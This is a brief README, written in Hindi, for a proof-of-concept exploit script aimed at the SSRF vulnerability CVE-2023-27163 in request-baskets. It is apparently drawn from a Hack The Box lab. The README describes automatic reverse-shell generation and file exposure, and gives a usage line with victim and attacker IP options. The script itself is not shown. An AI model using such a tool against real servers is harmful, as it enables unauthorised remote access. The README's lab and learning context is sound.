
CVE-2023-27163 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, request-baskets v1.2.1 तक में सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता। स्वचालित रिवर्स शेल जनरेशन और फ़ाइल एक्सपोज़र शामिल है।
PoC CVE-2023-27163, SSRF, request-baskets v1.2.1 तक
उपयोग उदाहरण
my_script.sh -i 10.10.11.111 -f 'localhost:80' -t 10.10.14.27
-i पीड़ित सर्वर का IP
-f वह IP या पता जहां SSRF द्वारा उत्पन्न कनेक्शनों को निर्देशित किया जाए
-t इस विकल्प में आपका स्थानीय IP या हमलावर IP डालें, rev.sh फ़ाइल उत्पन्न करने और फ़ाइल को एक्सपोज़ करने के लिए।
-p यदि आप कोई विशिष्ट पोर्ट सेट करना चाहते हैं।
यह स्क्रिप्ट HTB के एक व्यावहारिक प्रयोगशाला पर आधारित विकसित की गई थी।